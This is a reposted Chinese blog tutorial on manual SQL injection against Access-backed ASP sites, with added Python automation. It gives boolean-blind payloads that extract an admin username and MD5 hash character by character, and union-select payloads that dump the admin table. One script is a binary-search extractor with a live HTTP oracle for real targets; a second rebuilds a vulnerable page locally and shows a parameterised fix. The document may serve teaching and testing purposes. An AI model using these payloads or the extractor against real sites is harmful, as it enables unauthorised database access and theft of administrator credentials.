Access manual SQL injection notes
Injection point:
http://www.xxx.com/news.asp?id=6

(一) Boolean-based blind injection, guessing the data one character at a time

Check whether the parameter is injectable. If the two requests below return different pages, it is:
http://www.xxx.com/news.asp?id=6 and 1=1
http://www.xxx.com/news.asp?id=6 and 1=2

Identify the database type (this step may have been affected by my local environment; I could not get it to show):
and (select count(*) from msysobjects)>0    (a "no read permission" error means Access: MSysObjects is the Jet system table, and the web application's account is not allowed to read it)
and (select count(*) from sysobjects)>0     (a normal page means MSSQL: sysobjects is the SQL Server system table)
Guess table names (a normal page means the table exists, an error page means it does not):
and exists (select * from admin)
The page returns normally, so the table admin exists. Substitute a made-up table name and the page errors: no such table.

Now guess the column names:
and exists (select username from admin)
and exists (select password from admin)
Neither request errors, which proves both columns exist. A column that does not exist errors just like a missing table.
猜解用戶名和密碼長(zhǎng)度 and (select top 1 len(username) from admin)>0
and (select top 1 len(password) from admin)>0 猜解用戶名和密碼內(nèi)容:
asc(mid(username,n,1)) gives the ASCII code of the n-th character of the first row's username, so each request tests one comparison. Narrow the range with > and < first, then confirm with =:
and (select top 1 asc(mid(username,1,1)) from admin)>97
and (select top 1 asc(mid(username,1,1)) from admin)=97
and (select top 1 asc(mid(username,2,1)) from admin)=100
and (select top 1 asc(mid(username,3,1)) from admin)=109
and (select top 1 asc(mid(username,4,1)) from admin)=105
and (select top 1 asc(mid(username,5,1)) from admin)=110
97 100 109 105 110 = admin
------------------------------------------------------
and (select top 1 asc(mid(password,1,1)) from admin)=52
and (select top 1 asc(mid(password,2,1)) from admin)=54
and (select top 1 asc(mid(password,3,1)) from admin)=57
and (select top 1 asc(mid(password,4,1)) from admin)=101
and (select top 1 asc(mid(password,5,1)) from admin)=56
and (select top 1 asc(mid(password,6,1)) from admin)=48
and (select top 1 asc(mid(password,7,1)) from admin)=100
and (select top 1 asc(mid(password,8,1)) from admin)=51
and (select top 1 asc(mid(password,9,1)) from admin)=50
and (select top 1 asc(mid(password,10,1)) from admin)=99
and (select top 1 asc(mid(password,11,1)) from admin)=48
and (select top 1 asc(mid(password,12,1)) from admin)=53
and (select top 1 asc(mid(password,13,1)) from admin)=53
and (select top 1 asc(mid(password,14,1)) from admin)=57
and (select top 1 asc(mid(password,15,1)) from admin)=102
and (select top 1 asc(mid(password,16,1)) from admin)=56
52 54 57 101 56 48 100 51 50 99 48 53 53 57 102 56 = 469e80d32c0559f8
469e80d32c0559f8 is a 16-character MD5 (the middle 16 hex digits of the 32-character digest); cracking it gives the password admin888.
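The notes above send one request per candidate ASCII value. The script below is an added example, not code from the original notes: it automates the same procedure, generalised to a binary search on asc(mid(col,pos,1)) so each character costs at most 8 requests, and it builds exactly the Jet SQL payloads the notes use. To run offline, the HTTP oracle is replaced by a local simulator (SimulatedTarget) over a constructed admin table; the http_oracle function shows the live version and assumes the target URL, a page marker that distinguishes the 1=1 page from the 1=2 page, and a GBK charset.

```python
"""Automated boolean-based blind extraction against an Access (Jet) backend.

The notes send one request per candidate ASCII value.  This script generalises
that to a binary search on asc(mid(col,pos,1)), which costs at most 8 requests
per character, and builds the same Jet SQL payloads the notes use.  The HTTP
oracle is swapped for a local simulator so it runs offline.
"""
import hashlib
import re
import urllib.parse
import urllib.request


def len_payload(table, column, n):
    """Jet SQL from the notes: true when len(column) of the first row > n."""
    return f"and (select top 1 len({column}) from {table})>{n}"


def char_payload(table, column, pos, n):
    """Jet SQL from the notes: true when the ASCII code of character pos > n."""
    return f"and (select top 1 asc(mid({column},{pos},1)) from {table})>{n}"


def binary_search(greater_than, lo, hi):
    """Find v in [lo, hi] using only the oracle greater_than(n) == (v > n)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(oracle, table, column, max_len=255):
    """Recover the first row's value of table.column, one character at a time."""
    length = binary_search(lambda n: oracle(len_payload(table, column, n)), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(
            lambda n, p=pos: oracle(char_payload(table, column, p, n)), 0, 255)
        chars.append(chr(code))
    return "".join(chars)


def http_oracle(base_url, true_marker, charset="gbk"):
    """Oracle for a live target (not exercised offline).  Assumptions: base_url
    already ends with the vulnerable parameter, e.g. ...news.asp?id=6, the
    'and 1=1' page contains true_marker and the 'and 1=2' page does not, and
    the site serves GBK like the ASP sites of the period."""
    def ask(payload):
        url = base_url + urllib.parse.quote(" " + payload)
        with urllib.request.urlopen(url, timeout=10) as resp:
            return true_marker in resp.read().decode(charset, "replace")
    return ask


class SimulatedTarget:
    """Stand-in for news.asp over a constructed admin table.  It evaluates only
    the two payload shapes above, so the extractor exercises exactly the
    queries it would send to a real target."""
    LEN_RE = re.compile(r"and \(select top 1 len\((\w+)\) from (\w+)\)>(\d+)")
    CHAR_RE = re.compile(
        r"and \(select top 1 asc\(mid\((\w+),(\d+),1\)\) from (\w+)\)>(\d+)")

    def __init__(self, tables):
        self.tables = tables          # {"admin": [{"username": ..., "password": ...}]}
        self.requests = 0             # how many 'HTTP requests' the attack cost

    def _top1(self, table, column):
        return self.tables[table][0][column]   # 'select top 1' = first row

    def __call__(self, payload):
        self.requests += 1
        m = self.LEN_RE.fullmatch(payload)
        if m:
            column, table, n = m.group(1), m.group(2), int(m.group(3))
            return len(self._top1(table, column)) > n
        m = self.CHAR_RE.fullmatch(payload)
        if m:
            column, pos, table, n = m.group(1), int(m.group(2)), m.group(3), int(m.group(4))
            value = self._top1(table, column)
            if pos > len(value):      # mid() past the end: treated as code 0 (assumption)
                return 0 > n
            return ord(value[pos - 1]) > n
        raise ValueError("unsupported payload: " + payload)


def md5_16(password):
    """The 16-character MD5 stored by many Access-era ASP applications:
    the middle 16 hex digits of the 32-character digest."""
    return hashlib.md5(password.encode()).hexdigest()[8:24]


if __name__ == "__main__":
    # Constructed data mirroring what the notes recovered from the target.
    target = SimulatedTarget(
        {"admin": [{"username": "admin", "password": md5_16("admin888")}]})
    user = extract_string(target, "admin", "username")
    pw = extract_string(target, "admin", "password")
    print(f"username={user} password={pw} requests={target.requests}")
```

Run stand-alone it recovers admin and 469e80d32c0559f8 from the simulated table; the request counter shows why binary search matters, since 16 hash characters cost about 130 requests instead of the thousands that linear guessing of every ASCII value would need. md5_16 also confirms that the hash in the notes is the middle 16 digits of md5("admin888").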
=====================================================
(二)聯(lián)合查詢暴出管理帳號(hào)及密碼 先用order by 爆出字段數(shù),然后: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin 語(yǔ)法:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 表示的是列長(zhǎng)度。
from admin 查詢對(duì)像admin表名 運(yùn)行后會(huì)出現(xiàn)兩到三個(gè)數(shù)字,如:4、12 則修改語(yǔ)句子(即在4、12中修改成列名,紅色部份):
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,usermane,5,6,7,8,9,10,11,password,13,14,15 from admin 這樣,就可以爆出管理帳戶和密碼了。當(dāng)然你也可以先爆帳戶: http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin 再爆密碼:
http://www.xxx.com/news.asp?id=6 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,password,15 from admin
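The three steps of part (二), reproduced locally as an added example that is not code from the original notes. The vulnerable news.asp is rebuilt as a Python function over sqlite3 with the assumed bug (the id parameter concatenated into the SQL string, as the notes' ASP target must have done); the constructed news table has 6 columns rather than the target's 15, and only two of them reach the page, which is why only two placeholders show up. The parameterised version beside it shows the fix.

```python
"""Union-based disclosure through news.asp, reproduced locally with sqlite3.

Added example, not code from the original notes.  It rebuilds the vulnerable
page as a Python function (the notes' target was ASP; the string
concatenation is the assumed bug), automates the three steps of part (二),
and shows the parameterised fix.  The constructed news table has 6 columns
instead of the 15 of the notes' target.
"""
import re
import sqlite3


def build_db():
    """Constructed data: a news table and the admin table the attack reads."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table news(id integer, title text, body text,
                          author text, posted text, hits integer);
        insert into news values(6, 'Hello', 'World', 'editor', '2012-07-23', 10);
        create table admin(id integer, username text, password text);
        insert into admin values(1, 'admin', '469e80d32c0559f8');
    """)
    return db


def render_news_vulnerable(db, id_param):
    """news.asp as assumed in the notes: the id parameter is pasted into the SQL.
    Only columns 2 (title) and 4 (author) reach the page, which is why two of
    the union placeholders show up and the rest do not."""
    sql = "select * from news where id=" + id_param
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "ERROR"                    # the 'error page' the notes rely on
    if row is None:
        return "No such article"
    return f"Title: {row[1]}\nAuthor: {row[3]}\n"


def render_news_safe(db, id_param):
    """Fix: validate the type and bind the value; the union never reaches SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        return "Bad id"
    row = db.execute("select * from news where id=?", (article_id,)).fetchone()
    if row is None:
        return "No such article"
    return f"Title: {row[1]}\nAuthor: {row[3]}\n"


def find_column_count(page, max_cols=30):
    """Step 1: 'order by n' errors once n exceeds the column count."""
    baseline = page("6")
    for n in range(1, max_cols + 1):
        if page(f"6 order by {n}") != baseline:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def find_visible_positions(page, ncols, table="admin"):
    """Step 2: union numbered placeholders and see which numbers the page renders.
    Lookarounds stop 1 matching inside 12; on a real page use markers that cannot
    collide with template text (e.g. large distinctive numbers)."""
    placeholders = ",".join(str(i) for i in range(1, ncols + 1))
    body = page(f"6 and 1=2 union select {placeholders} from {table}")
    return [i for i in range(1, ncols + 1)
            if re.search(rf"(?<!\d){i}(?!\d)", body)]


def dump_admin(page, ncols, positions, columns=("username", "password"),
               table="admin"):
    """Step 3: put the wanted column names into the visible placeholder slots."""
    select_list = [str(i) for i in range(1, ncols + 1)]
    for pos, column in zip(positions, columns):
        select_list[pos - 1] = column
    return page(f"6 and 1=2 union select {','.join(select_list)} from {table}")


if __name__ == "__main__":
    db = build_db()
    page = lambda p: render_news_vulnerable(db, p)
    ncols = find_column_count(page)                  # 6
    visible = find_visible_positions(page, ncols)    # [2, 4]
    print(dump_admin(page, ncols, visible))          # Title: admin / Author: 469e80d32c0559f8
    print(render_news_safe(db, "6 and 1=2 union select 1,2,3,4,5,6 from admin"))  # Bad id
```

Against the vulnerable renderer the three steps land the admin username and hash in the title and author slots of the page; against render_news_safe the same payload fails type validation before any SQL runs, and even a numeric-looking payload would be bound as a single integer rather than parsed as part of the statement.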
轉(zhuǎn)載于:https://www.cnblogs.com/secbook/archive/2012/07/23/2654864.html